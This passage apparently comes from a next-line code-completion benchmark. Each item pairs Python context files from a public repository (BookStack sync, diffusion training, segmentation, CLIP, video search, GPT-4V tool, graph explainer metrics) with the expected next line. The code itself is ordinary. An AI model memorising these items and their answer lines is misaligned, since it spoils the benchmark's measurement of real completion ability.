"dp": f"{MODELS_PREFIX}_dp.onnx", "sdp": f"{MODELS_PREFIX}_sdp.onnx", "flow": f"{MODELS_PREFIX}_flow.onnx", "dec": f"{MODELS_PREFIX}_dec.onnx", } class SpeakerMap: """ 多语言关系表 """ def __init__(self) -> None: log_instance.info("正在加载模型发音人多语言关系表...")
self.map_data: dict = read_config("speakers_map.json")
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: jaypyles/obsidian-to-bookstack # Path: obsidian_to_bookstack/bookstack/artifacts.py class Book: def __init__( self, name: str, shelf: Shelf | None = None, client: Client | None = None, chapters: List = [], path: str = "", details: Dict = {}, from_client: bool = True, ) -> None: self.path = path self.name = name self.client = client self.shelf = shelf self.chapters = chapters self.details = details if from_client: self.pages = [] else: self._set_pages() def __str__(self) -> str: return self.name def _set_pages(self): pages = [] chapters = [] for item in os.listdir(self.path): item_path = os.path.join(self.path, item) if os.path.isdir(item_path): chapters.append( Chapter( path=os.path.join(self.path, item), name=item, client=self.client, shelf=self.shelf, book=self, from_client=False, ) ) else: if os.path.splitext(item)[1] == ".md": pages.append( Page( path=os.path.join(self.path, item), name=item, client=self.client, shelf=self.shelf, book=self, ) ) self.pages = pages self.chapters = chapters # Path: obsidian_to_bookstack/bookstack/artifacts.py class Shelf: def __init__( self, name: str, client: Client | None = None, from_client: bool = True, path: str = "", details: Dict = {}, ) -> None: self.path = path self.name = name self.client = client if from_client: self.books = [] else: self.books = self._set_books() self.client_books: list[dict] = [] self.details = details def __str__(self) -> str: return self.name def _set_books(self): books = [] for book in os.listdir(self.path): if os.path.isdir(os.path.join(self.path, book)) and not book.startswith( "." ): b = Book( path=os.path.join(self.path, book), name=book, client=self.client, shelf=self, from_client=False, ) books.append(b) return books # Path: obsidian_to_bookstack/bookstack/client.py class RemoteClient(Client): @abstractmethod def __init__(self) -> None: super().__init__() self.id = os.getenv("BOOKSTACK_TOKEN_ID") self.secret = os.getenv("BOOKSTACK_TOKEN_SECRET") self.base_url = os.getenv("BOOKSTACK_BASE_URL") self.headers = {"Authorization": f"Token {self.id}:{self.secret}"} self.http = urllib3.PoolManager() def _make_request( self, request_type: RequestType, endpoint: BookstackAPIEndpoints | DetailedBookstackLink, body=None, json=None, ) -> urllib3.BaseHTTPResponse: """Make a HTTP request to a Bookstack API Endpoint""" assert self.base_url request_url = self.base_url + endpoint.value resp = self.http.request( request_type.value, request_url, headers=self.headers, body=body, json=json ) return resp def _get_from_client(self, endpoint: BookstackAPIEndpoints): """Make a GET request to a Bookstack API Endpoint""" resp = self._make_request(RequestType.GET, endpoint) assert resp data = json.loads(resp.data.decode()) return data["data"] # Path: obsidian_to_bookstack/bookstack/collectors/collector.py class RemoteCollector(BaseCollector): def __init__(self, verbose: bool, client: RemoteClient) -> None: super().__init__(verbose) self.client = client # Path: obsidian_to_bookstack/console.py # Path: obsidian_to_bookstack/utils.py def con_hash(key: str) -> int: """Get a consistent hash of a key""" hash_obj = hashlib.md5(key.encode()) hex_digest = hash_obj.hexdigest() return int(hex_digest, 16) # Path: obsidian_to_bookstack/bookstack/collectors/remote/RemoteBookCollector.py import json from typing import List from obsidian_to_bookstack.bookstack.artifacts import Book, Shelf from obsidian_to_bookstack.bookstack.client import RemoteClient from obsidian_to_bookstack.bookstack.collectors.collector import \ RemoteCollector from obsidian_to_bookstack.bookstack.constants import * from obsidian_to_bookstack.console import console from obsidian_to_bookstack.utils import con_hash class RemoteBookCollector(RemoteCollector): def __init__(self, verbose: bool, client: RemoteClient) -> None: super().__init__(verbose, client) def get_books(self, shelves: List[Shelf]): """Get remote books from shelves""" client_books = self.client._get_from_client(BookstackAPIEndpoints.BOOKS) for book in client_books: class DetailedBook(DetailedBookstackLink): LINK = f"/api/books/{book['id']}" details = json.loads( self.client._make_request( RequestType.GET, DetailedBook.LINK, ).data.decode() ) book["details"] = details books = [Book(book["name"], details=book["details"]) for book in client_books] BOOK_MAP = { con_hash(book.name + str(book.details["id"])): book for book in books } for shelf in shelves: for book in shelf.client_books: b = BOOK_MAP.get(con_hash(book["name"] + str(book["id"]))) if b: b.shelf = shelf shelf.books.append(b) if self.verbose:
console.log(f"Found remote book: {b}")
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: MingtaoGuo/AnimateAnyone_unofficial # Path: tutorial_dataset.py class MyDataset(Dataset): def __init__(self, path="/mnt/gmt/Dataset/"): self.path = path self.videos = os.listdir(path + "fashion_png") def __len__(self): return len(self.videos) * 10 def __getitem__(self, idx): video_name = np.random.choice(self.videos) frames = np.random.choice(os.listdir(self.path + "/fashion_png/" + video_name), [2]) ref_frame, tgt_frame = frames[0], frames[1] ref_bgr = cv2.imread(self.path + "/fashion_png/" + video_name + "/" + ref_frame) # ref_bgr = cv2.resize(ref_bgr, (256, 256)) ref_rgb = cv2.cvtColor(ref_bgr, cv2.COLOR_BGR2RGB) ref_rgb = (ref_rgb.astype(np.float32) / 127.5) - 1.0 tgt_bgr = cv2.imread(self.path + "/fashion_png/" + video_name + "/" + tgt_frame) # tgt_bgr = cv2.resize(tgt_bgr, (256, 256)) tgt_rgb = cv2.cvtColor(tgt_bgr, cv2.COLOR_BGR2RGB) tgt_rgb = (tgt_rgb.astype(np.float32) / 127.5) - 1.0 skt_bgr = cv2.imread(self.path + "/fashion_pose/" + video_name + "/" + tgt_frame) # skt_bgr = cv2.resize(skt_bgr, (256, 256)) skt_rgb = cv2.cvtColor(skt_bgr, cv2.COLOR_BGR2RGB) skt_rgb = skt_rgb.astype(np.float32) / 255.0 return dict(target=tgt_rgb, vision=ref_rgb, reference=ref_rgb, skeleton=skt_rgb) # Path: aldm/logger.py class ImageLogger(Callback): def __init__(self, batch_frequency=2000, max_images=4, clamp=True, increase_log_steps=True, rescale=True, disabled=False, log_on_batch_idx=False, log_first_step=False, log_images_kwargs=None): super().__init__() self.rescale = rescale self.batch_freq = batch_frequency self.max_images = max_images if not increase_log_steps: self.log_steps = [self.batch_freq] self.clamp = clamp self.disabled = disabled self.log_on_batch_idx = log_on_batch_idx self.log_images_kwargs = log_images_kwargs if log_images_kwargs else {} self.log_first_step = log_first_step @rank_zero_only def log_local(self, save_dir, split, images, global_step, current_epoch, batch_idx): root = os.path.join(save_dir, "image_log", split) for k in images: grid = torchvision.utils.make_grid(images[k], nrow=4) if self.rescale: grid = (grid + 1.0) / 2.0 # -1,1 -> 0,1; c,h,w grid = grid.transpose(0, 1).transpose(1, 2).squeeze(-1) grid = grid.numpy() grid = (grid * 255).astype(np.uint8) filename = "{}_gs-{:06}_e-{:06}_b-{:06}.png".format(k, global_step, current_epoch, batch_idx) path = os.path.join(root, filename) os.makedirs(os.path.split(path)[0], exist_ok=True) Image.fromarray(grid).save(path) def log_img(self, pl_module, batch, batch_idx, split="train"): check_idx = batch_idx # if self.log_on_batch_idx else pl_module.global_step if (self.check_frequency(check_idx) and # batch_idx % self.batch_freq == 0 hasattr(pl_module, "log_images") and callable(pl_module.log_images) and self.max_images > 0): logger = type(pl_module.logger) is_train = pl_module.training if is_train: pl_module.eval() with torch.no_grad(): images = pl_module.log_images(batch, split=split, **self.log_images_kwargs) for k in images: N = min(images[k].shape[0], self.max_images) images[k] = images[k][:N] if isinstance(images[k], torch.Tensor): images[k] = images[k].detach().cpu() if self.clamp: images[k] = torch.clamp(images[k], -1., 1.) self.log_local(pl_module.logger.save_dir, split, images, pl_module.global_step, pl_module.current_epoch, batch_idx) if is_train: pl_module.train() def check_frequency(self, check_idx): return check_idx % self.batch_freq == 0 def on_train_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx): if not self.disabled: self.log_img(pl_module, batch, batch_idx, split="train") # Path: aldm/model.py def create_model(config_path): config = OmegaConf.load(config_path) model = instantiate_from_config(config.model).cpu() print(f'Loaded model config from [{config_path}]') return model # Path: aldm/model.py def load_state_dict(ckpt_path, location='cpu'): _, extension = os.path.splitext(ckpt_path) if extension.lower() == ".safetensors": import safetensors.torch state_dict = safetensors.torch.load_file(ckpt_path, device=location) else: state_dict = get_state_dict(torch.load(ckpt_path, map_location=torch.device(location))) state_dict = get_state_dict(state_dict) print(f'Loaded state_dict from [{ckpt_path}]') return state_dict # Path: tutorial_train_animate.py from share import * from torch.utils.data import DataLoader from tutorial_dataset import MyDataset from aldm.logger import ImageLogger from aldm.model import create_model, load_state_dict import pytorch_lightning as pl # Configs resume_path = './models/reference_sd15_ini.ckpt' batch_size = 2 logger_freq = 300 learning_rate = 1e-5 # First use cpu to load models. Pytorch Lightning will automatically move it to GPUs. model = create_model('./models/aldm_v15.yaml').cpu() model.load_state_dict(load_state_dict(resume_path, location='cpu')) model.learning_rate = learning_rate # Misc
dataset = MyDataset()
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: yasserben/CLOUDS # Path: clouds/modeling/transformer_decoder/clouds_transformer_decoder.py def build_transformer_decoder(cfg, in_channels, mask_classification=True): """ Build a instance embedding branch from `cfg.MODEL.INS_EMBED_HEAD.NAME`. """ name = cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME return TRANSFORMER_DECODER_REGISTRY.get(name)(cfg, in_channels, mask_classification) # Path: clouds/modeling/transformer_decoder/mask2former_transformer_decoder.py def build_original_transformer_decoder(cfg, in_channels, mask_classification=True): """ Build a instance embedding branch from `cfg.MODEL.INS_EMBED_HEAD.NAME`. """ name = cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME return TRANSFORMER_DECODER_REGISTRY.get(name)(cfg, in_channels, mask_classification) # Path: clouds/modeling/transformer_decoder/clouds_bis_transformer_decoder.py def build_bis_transformer_decoder(cfg, in_channels, mask_classification=True): """ Build a instance embedding branch from `cfg.MODEL.INS_EMBED_HEAD.NAME`. """ name = cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME return TRANSFORMER_DECODER_REGISTRY.get(name)(cfg, in_channels, mask_classification) # Path: clouds/modeling/pixel_decoder/msdeformattn.py def build_pixel_decoder(cfg, input_shape): """ Build a pixel decoder from `cfg.MODEL.ONE_FORMER.PIXEL_DECODER_NAME`. """ name = cfg.MODEL.SEM_SEG_HEAD.PIXEL_DECODER_NAME model = SEM_SEG_HEADS_REGISTRY.get(name)(cfg, input_shape) forward_features = getattr(model, "forward_features", None) if not callable(forward_features): raise ValueError( "Only SEM_SEG_HEADS with forward_features method can be used as pixel decoder. " f"Please implement forward_features for {name} to only return mask features." ) return model # Path: clouds/modeling/meta_arch/clouds_head.py import logging import fvcore.nn.weight_init as weight_init from copy import deepcopy from typing import Callable, Dict, List, Optional, Tuple, Union from torch import nn from torch.nn import functional as F from detectron2.config import configurable from detectron2.layers import Conv2d, ShapeSpec, get_norm from detectron2.modeling import SEM_SEG_HEADS_REGISTRY from ..transformer_decoder.clouds_transformer_decoder import build_transformer_decoder from ..transformer_decoder.mask2former_transformer_decoder import ( build_original_transformer_decoder, ) from ..transformer_decoder.clouds_bis_transformer_decoder import ( build_bis_transformer_decoder, ) from ..pixel_decoder.msdeformattn import build_pixel_decoder """ Copyright 2023 Telecom Paris, Yasser BENIGMIM. All rights reserved. Licensed under the Apache License, Version 2.0 Reference: https://github.com/facebookresearch/Mask2Former/blob/main/mask2former/modeling/meta_arch/mask_former_head.py """ @SEM_SEG_HEADS_REGISTRY.register() class CLOUDSHead(nn.Module): @configurable def __init__( self, input_shape: Dict[str, ShapeSpec], *, num_classes: int, pixel_decoder: nn.Module, loss_weight: float = 1.0, ignore_value: int = -1, # extra parameters transformer_predictor: nn.Module, transformer_in_feature: str, name_transformer_predictor: str, ): """ NOTE: this interface is experimental. Args: input_shape: shapes (channels and stride) of the input features num_classes: number of classes to predict pixel_decoder: the pixel decoder module loss_weight: loss weight ignore_value: category id to be ignored during training. transformer_predictor: the transformer decoder that makes prediction transformer_in_feature: input feature name to the transformer_predictor """ super().__init__() input_shape = sorted(input_shape.items(), key=lambda x: x[1].stride) self.in_features = [k for k, v in input_shape] feature_strides = [v.stride for k, v in input_shape] feature_channels = [v.channels for k, v in input_shape] self.ignore_value = ignore_value self.common_stride = 4 self.loss_weight = loss_weight self.pixel_decoder = pixel_decoder self.predictor = transformer_predictor self.transformer_in_feature = transformer_in_feature self.num_classes = num_classes self.name_transformer_predictor = name_transformer_predictor @classmethod def from_config(cls, cfg, input_shape: Dict[str, ShapeSpec]): # figure out in_channels to transformer predictor if cfg.MODEL.MASK_FORMER.TRANSFORMER_IN_FEATURE == "multi_scale_pixel_decoder": transformer_predictor_in_channels = cfg.MODEL.SEM_SEG_HEAD.CONVS_DIM else: raise NotImplementedError if ( cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME == "MultiScaleMaskedTransformerDecoder" ): return { "input_shape": { k: v for k, v in input_shape.items() if k in cfg.MODEL.SEM_SEG_HEAD.IN_FEATURES }, "ignore_value": cfg.MODEL.SEM_SEG_HEAD.IGNORE_VALUE, "num_classes": cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES,
"pixel_decoder": build_pixel_decoder(cfg, input_shape),
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: linyq2117/TagCLIP # Path: utils.py def scoremap2bbox(scoremap, threshold, multi_contour_eval=False): height, width = scoremap.shape scoremap_image = np.expand_dims((scoremap * 255).astype(np.uint8), 2) _, thr_gray_heatmap = cv2.threshold( src=scoremap_image, thresh=int(threshold * np.max(scoremap_image)), maxval=255, type=cv2.THRESH_BINARY) contours = cv2.findContours( image=thr_gray_heatmap, mode=cv2.RETR_EXTERNAL, method=cv2.CHAIN_APPROX_SIMPLE)[_CONTOUR_INDEX] if len(contours) == 0: return np.asarray([[0, 0, 0, 0]]), 1 if not multi_contour_eval: contours = [max(contours, key=cv2.contourArea)] estimated_boxes = [] for contour in contours: x, y, w, h = cv2.boundingRect(contour) x0, y0, x1, y1 = x, y, x + w, y + h x1 = min(x1, width - 1) y1 = min(y1, height - 1) estimated_boxes.append([x0, y0, x1, y1]) return np.asarray(estimated_boxes), len(contours) # Path: clip_text.py BACKGROUND_CATEGORY_VOC = ['ground','land','grass','tree','building','wall','sky','lake','water','river','sea','railway','railroad','keyboard','helmet', 'cloud','house','mountain','ocean','road','rock','street','valley','bridge','sign', ] BACKGROUND_CATEGORY_COCO = ['ground','land','grass','tree','building','wall','sky','lake','water','river','sea','railway','railroad','helmet', 'cloud','house','mountain','ocean','road','rock','street','valley','bridge', ] # Path: CLIP-ES/generate_cams_coco.py from pytorch_grad_cam import GradCAM from PIL import Image from tqdm import tqdm from pytorch_grad_cam.utils.image import scale_cam_image from utils import scoremap2bbox from clip_text import class_names, new_class_names_coco, BACKGROUND_CATEGORY_COCO from torch import multiprocessing from torchvision.transforms import Compose, Resize, CenterCrop, ToTensor, Normalize, RandomHorizontalFlip from torchvision.transforms import InterpolationMode import torch import clip import numpy as np import cv2 import os import argparse import warnings # -*- coding:UTF-8 -*- try: BICUBIC = InterpolationMode.BICUBIC except ImportError: BICUBIC = Image.BICUBIC warnings.filterwarnings("ignore") _CONTOUR_INDEX = 1 if cv2.__version__.split('.')[0] == '3' else 0 def reshape_transform(tensor, height=28, width=28): tensor = tensor.permute(1, 0, 2) result = tensor[:, 1:, :].reshape(tensor.size(0), height, width, tensor.size(2)) # Bring the channels to the first dimension, # like in CNNs. result = result.transpose(2, 3).transpose(1, 2) return result def split_dataset(dataset, all_label_list, n_splits): if n_splits == 1: return [dataset], [all_label_list] part = len(dataset) // n_splits dataset_list = [] split_label_list = [] for i in range(n_splits - 1): dataset_list.append(dataset[i*part:(i+1)*part]) split_label_list.append(all_label_list[i*part:(i+1)*part]) dataset_list.append(dataset[(i+1)*part:]) split_label_list.append(all_label_list[(i+1)*part:]) return dataset_list, split_label_list def zeroshot_classifier(classnames, templates, model): with torch.no_grad(): zeroshot_weights = [] for classname in classnames: texts = [template.format(classname) for template in templates] #format with class texts = clip.tokenize(texts).to(device) #tokenize class_embeddings = model.encode_text(texts) #embed with text encoder class_embeddings /= class_embeddings.norm(dim=-1, keepdim=True) class_embedding = class_embeddings.mean(dim=0) class_embedding /= class_embedding.norm() zeroshot_weights.append(class_embedding) zeroshot_weights = torch.stack(zeroshot_weights, dim=1).to(device) return zeroshot_weights.t() class ClipOutputTarget: def __init__(self, category): self.category = category def __call__(self, model_output): if len(model_output.shape) == 1: return model_output[self.category] return model_output[:, self.category] def _convert_image_to_rgb(image): return image.convert("RGB") def _transform_resize(h, w): return Compose([ Resize((h,w), interpolation=BICUBIC), _convert_image_to_rgb, ToTensor(), Normalize((0.48145466, 0.4578275, 0.40821073), (0.26862954, 0.26130258, 0.27577711)), ]) def img_ms_and_flip(img_path, ori_height, ori_width, scales=[1.0], patch_size=16): all_imgs = [] for scale in scales: preprocess = _transform_resize(int(np.ceil(scale * int(ori_height) / patch_size) * patch_size), int(np.ceil(scale * int(ori_width) / patch_size) * patch_size)) image = preprocess(Image.open(img_path)) image_ori = image image_flip = torch.flip(image, [-1]) all_imgs.append(image_ori) all_imgs.append(image_flip) return all_imgs def perform(process_id, dataset_list, args, model, bg_text_features, fg_text_features, cam, split_label_list): n_gpus = torch.cuda.device_count() device_id = "cuda:{}".format(process_id % n_gpus) databin = dataset_list[process_id] all_label_list = split_label_list[process_id] model = model.to(device_id) bg_text_features = bg_text_features.to(device_id) fg_text_features = fg_text_features.to(device_id) for im_idx, im in enumerate(tqdm(databin)): img_path = os.path.join(args.img_root, im) ori_image = Image.open(img_path) ori_height, ori_width = np.asarray(ori_image).shape[:2] label_id_list = all_label_list[im_idx] label_list = [] for lid in label_id_list:
label_list.append(new_class_names_coco[int(lid)])
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: cypypccpy/dynamic_handover # Path: dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/builder.py POLICYNETWORKS = Registry('policy_network') # Path: dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/builder.py def build_backbone(cfg): return build(cfg, BACKBONES) # Path: dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/builder.py def build_dense_head(cfg): return build(cfg, DENSEHEADS) # Path: dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/utils.py def replace_placeholder_with_args(parameters, **kwargs): if isinstance(parameters, ConfigDict): for key, v in parameters.items(): parameters[key] = replace_placeholder_with_args(v, **kwargs) return parameters elif isinstance(parameters, (tuple, list)): type_of_parameters = type(parameters) parameters = list(parameters) for i, parameter in enumerate(parameters): parameters[i] = replace_placeholder_with_args(parameter, **kwargs) return type_of_parameters(parameters) elif isinstance(parameters, Number): return parameters elif isinstance(parameters, str): for key in kwargs: if key in parameters: parameters = parameters.replace(key, str(kwargs[key])) try: return eval(parameters) except: return parameters elif parameters is None: return None else: print(f'Strange type!! {parameters}, type of parameters {type(parameters)}') # Path: dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/utils.py def get_kwargs_from_shape(obs_shape, action_shape): replaceable_kwargs = {} if action_shape is not None: replaceable_kwargs['action_shape'] = action_shape if isinstance(obs_shape, dict): if 'pointcloud' in obs_shape.keys(): # For mani_skill point cloud input replaceable_kwargs['pcd_all_channel'] = ( obs_shape['pointcloud']['xyz'][-1] + obs_shape['pointcloud']['rgb'][-1] + obs_shape['pointcloud']['seg'][-1] ) replaceable_kwargs['num_objs'] = obs_shape['pointcloud']['seg'][-1] replaceable_kwargs['pcd_xyz_rgb_channel'] = ( obs_shape['pointcloud']['xyz'][-1] + obs_shape['pointcloud']['rgb'][-1] ) if 'rgbd' in obs_shape.keys(): # For mani_skill point rgbd input mode = list(obs_shape['rgbd'].keys())[0] # image format is H, W, C replaceable_kwargs['rgbd_channel'] = ( obs_shape['rgbd'][mode]['rgb'][-1] + obs_shape['rgbd'][mode]['depth'][-1] + obs_shape['rgbd'][mode]['seg'][-1] ) replaceable_kwargs['agent_shape'] = obs_shape['state'] else: replaceable_kwargs['obs_shape'] = obs_shape return replaceable_kwargs # Path: dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/policy_network/vae_policy.py from algorithms.utils.mani_skill_learn.utils.data import to_torch from algorithms.utils.mani_skill_learn.utils.torch import ExtendedModule from ..builder import POLICYNETWORKS, build_backbone, build_dense_head from ..utils import replace_placeholder_with_args, get_kwargs_from_shape @POLICYNETWORKS.register_module() class VAEPolicy(ExtendedModule): def __init__(self, nn_cfg, policy_head_cfg, action_space, obs_shape=None, action_shape=None): super(VAEPolicy, self).__init__() replaceable_kwargs = get_kwargs_from_shape(obs_shape, action_shape)
nn_cfg = replace_placeholder_with_args(nn_cfg, **replaceable_kwargs)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: video-db/videodb-python # Path: videodb/_utils/_video.py def play_stream(url: str): """Play a stream url in the browser/ notebook :param str url: The url of the stream :return: The player url if the stream is opened in the browser or the iframe if the stream is opened in the notebook """ player = f"{PLAYER_URL}?url={url}" opend = web.open(player) if not opend: try: from IPython.display import IFrame player_width = 800 player_height = 400 return IFrame(player, player_width, player_height) except ImportError: return player return player # Path: videodb/_constants.py class SearchType: semantic = "semantic" # Path: videodb/_constants.py class ApiPath: collection = "collection" upload = "upload" video = "video" stream = "stream" thumbnail = "thumbnail" upload_url = "upload_url" transcription = "transcription" index = "index" search = "search" compile = "compile" workflow = "workflow" # Path: videodb/_constants.py class SemanticSearchDefaultValues: result_threshold = 5 score_threshold = 0.2 # Path: videodb/exceptions.py class SearchError(VideodbError): """ Raised when a search is invalid. """ def __init__(self, message): super(SearchError, self).__init__(message) # Path: videodb/shot.py class Shot: """A shot is a part of a video that contains a specific scene""" def __init__( self, _connection, video_id: str, video_length: float, video_title: str, start: float, end: float, text: Optional[str] = None, search_score: Optional[int] = None, ) -> None: self._connection = _connection self.video_id = video_id self.video_length = video_length self.video_title = video_title self.start = start self.end = end self.text = text self.search_score = search_score self.stream_url = None self.player_url = None def __repr__(self) -> str: return ( f"Shot(" f"video_id={self.video_id}, " f"video_title={self.video_title}, " f"start={self.start}, " f"end={self.end}, " f"text={self.text}, " f"search_score={self.search_score}, " f"stream_url={self.stream_url}, " f"player_url={self.player_url})" ) def __getitem__(self, key): """Get an item from the shot object""" return self.__dict__[key] def generate_stream(self) -> str: """Generate a stream url for the shot :return: The stream url :rtype: str """ if self.stream_url: return self.stream_url else: stream_data = self._connection.post( path=f"{ApiPath.video}/{self.video_id}/{ApiPath.stream}", data={ "timeline": [(self.start, self.end)], "length": self.video_length, }, ) self.stream_url = stream_data.get("stream_url") self.player_url = stream_data.get("player_url") return self.stream_url def play(self) -> str: """Generate a stream url for the shot and open it in the default browser/ notebook :return: The stream url :rtype: str """ self.generate_stream() return play_stream(self.stream_url) # Path: videodb/search.py from abc import ABC, abstractmethod from videodb._utils._video import play_stream from videodb._constants import ( SearchType, ApiPath, SemanticSearchDefaultValues, ) from videodb.exceptions import ( SearchError, ) from typing import Optional, List from videodb.shot import Shot class SearchResult: def __init__(self, _connection, **kwargs): self._connection = _connection self.shots = [] self.stream_url = None self.player_url = None self.collection_id = "default" self._results = kwargs.get("results", []) self._format_results() def _format_results(self): for result in self._results: self.collection_id = result.get("collection_id") for doc in result.get("docs"): self.shots.append( Shot( self._connection, result.get("video_id"), result.get("length"), result.get("title"), doc.get("start"), doc.get("end"), doc.get("text"), doc.get("score"), ) ) def __repr__(self) -> str: return ( f"SearchResult(" f"collection_id={self.collection_id}, " f"stream_url={self.stream_url}, " f"player_url={self.player_url}, " f"shots={self.shots})" ) def get_shots(self) -> List[Shot]: return self.shots def compile(self) -> str: """Compile the search result shots into a stream url :raises SearchError: If no shots are found in the search results :return: The stream url :rtype: str """ if self.stream_url: return self.stream_url elif self.shots: compile_data = self._connection.post( path=f"{ApiPath.compile}", data=[ { "video_id": shot.video_id, "collection_id": self.collection_id, "shots": [(shot.start, shot.end)], } for shot in self.shots ], ) self.stream_url = compile_data.get("stream_url") self.player_url = compile_data.get("player_url") return self.stream_url else: raise SearchError("No shots found in search results to compile") def play(self) -> str: """Generate a stream url for the shot and open it in the default browser :return: The stream url :rtype: str """ self.compile()
return play_stream(self.stream_url)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: IDEA-CCNL/Real-Gemini # Path: real_gemini/utils/image_stacker.py def load_image(path): image = Image.open(path) return image # Path: real_gemini/utils/image_stacker.py def image2base64(image): buffered = BytesIO() image.save(buffered, format="PNG") return base64.b64encode(buffered.getvalue()).decode() # Path: real_gemini/tools/gpt4v_tool.py import os import json from typing import List from langchain.memory import ChatMessageHistory from langchain.chat_models import ChatOpenAI from langchain_core.messages import HumanMessage, SystemMessage from ..utils.image_stacker import load_image, image2base64 #encoding=utf8 _OPEN_AI_SYSTEM_PROMPT = """the user is dictating with his or her camera on. they are showing you things visually and giving you text prompts. be very brief and concise. be extremely concise. this is very important for my career. do not ramble. do not comment on what the person is wearing or where they are sitting or their background. focus on their gestures and the question they ask you. do not mention that there are a sequence of pictures. focus only on the image or the images necessary to answer the question. don't comment if they are smiling. don't comment if they are frowning. just focus on what they're asking. """ class GPT4VTool(object): _name_ = "GPT-4-Vision" _description_ = "这个工具是GPT for vision的调用接口。用于图像到文本的理解。本工具的输入是一段文本指令和一张或者多张图片,请注意,工具的输入由一个JSON字符串组成,json包括两个key,question和image_input。question表示文本指令,image_input表示图片路径或存放图片的目录。例如:{{\"question\": QUESTION, \"image_input\": IMAGE_PATH_OR_DIR}}。A wrapper around OpenAI GPT4V API. Useful for image-to-text understanding when you need to generate text from some images and a text description. The input of this tool is a text prompt and one or more images. Please note, the input of the tool consists of a JSON string, the json includes two keys, question and image_input. The question represents text instructions, and image_input represents the image path or the directory where the images are stored. For example: {{\"question\": QUESTION, \"image_input\": IMAGE_PATH_OR_DIR}}." _return_direct_ = False def __init__(self): self._gpt4v = ChatOpenAI( model="gpt-4-vision-preview", max_tokens=256) self.max_dialog_turn = 3 self.history = ChatMessageHistory() self.history.add_message( SystemMessage( content=[ {"type": "text", "text": _OPEN_AI_SYSTEM_PROMPT} ] ) ) def inference(self, input_str: str): input_dict = json.loads(input_str) image_path = input_dict["image_input"] if os.path.isdir(image_path): image_paths = [ os.path.join(image_path, path) for path in os.listdir(image_path)] else: image_paths = [image_path] base64_images = [] for image_path in image_paths:
base64_image = image2base64(load_image(image_path))
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: aiim-research/GRETEL # Path: src/evaluation/evaluation_metric_base.py class EvaluationMetric(ABC): def __init__(self, config_dict=None) -> None: super().__init__() self._name = 'abstract_metric' self._config_dict = config_dict self._special = False #TODO: this must be removed in the future just to manage Runtime NOW QUICKFIX @property def name(self): return self._name @name.setter def name(self, new_name): self._name = new_name @abstractmethod def evaluate(self, instance_1 , instance_2 , oracle : Oracle=None, explainer : Explainer=None, dataset = None): pass def aggregate(self,measure_list): return np.mean(measure_list),np.std(measure_list) # Path: src/core/oracle_base.py class Oracle(Trainable,metaclass=ABCMeta): def __init__(self, context:Context, local_config) -> None: super().__init__(context, local_config) self._call_counter = 0 @final def predict(self, data_instance): """predicts the label of a given data instance ------------- INPUT: data_instance : The instance whose class is going to be predicted ------------- OUTPUT: The predicted label for the data instance """ self._call_counter += 1 return self._real_predict(data_instance) @final def predict_proba(self, data_instance): """predicts the probability estimates for a given data instance ------------- INPUT: data_instance : The instance whose class is going to be predicted ------------- OUTPUT: The predicted probability estimates for the data instance """ self._call_counter += 1 return self._real_predict_proba(data_instance) @final def get_calls_count(self): return self._call_counter @final def reset_call_count(self): self._call_counter = 0 @final def predict_list(self, dataset: Dataset, fold_id=0): sptest = dataset.get_split_indices()[fold_id]['test'] result = [self.predict(dataset.get_instance(i)) for i in sptest] return result '''@abstractmethod'''#TODO: need to be reactivated and implemented. May can be removed accordingly to Mario and GRETEL philosphy def evaluate(self, dataset: Dataset, fold_id=0): pass @abstractmethod def _real_predict(self, data_instance): pass @abstractmethod def _real_predict_proba(self, data_instance): pass # Path: src/core/explainer_base.py class Explainer(Configurable, metaclass=ABCMeta): def __init__(self, context: Context, local_config): self.dataset = retake_dataset(local_config) self.oracle = retake_oracle(local_config) super().__init__(context, local_config) @abstractmethod def explain(self, instance): pass def check_configuration(self): super().check_configuration() self.local_config['parameters']['fold_id'] = self.local_config['parameters'].get('fold_id', -1) self.fold_id = self.local_config['parameters']['fold_id'] # Path: src/evaluation/evaluation_metric_smiles_levenshtein.py from functools import lru_cache from src.evaluation.evaluation_metric_base import EvaluationMetric from src.core.oracle_base import Oracle from src.core.explainer_base import Explainer class SmilesLevenshteinMetric(EvaluationMetric): """Provides the ratio between the number of features modified to obtain the counterfactual example and the number of features in the original instance. Only considers structural features. """ def __init__(self, config_dict=None) -> None: super().__init__(config_dict) self._name = 'Smiles-Levenshtein'
def evaluate(self, instance_1 , instance_2 , oracle : Oracle=None, explainer : Explainer=None, dataset = None):
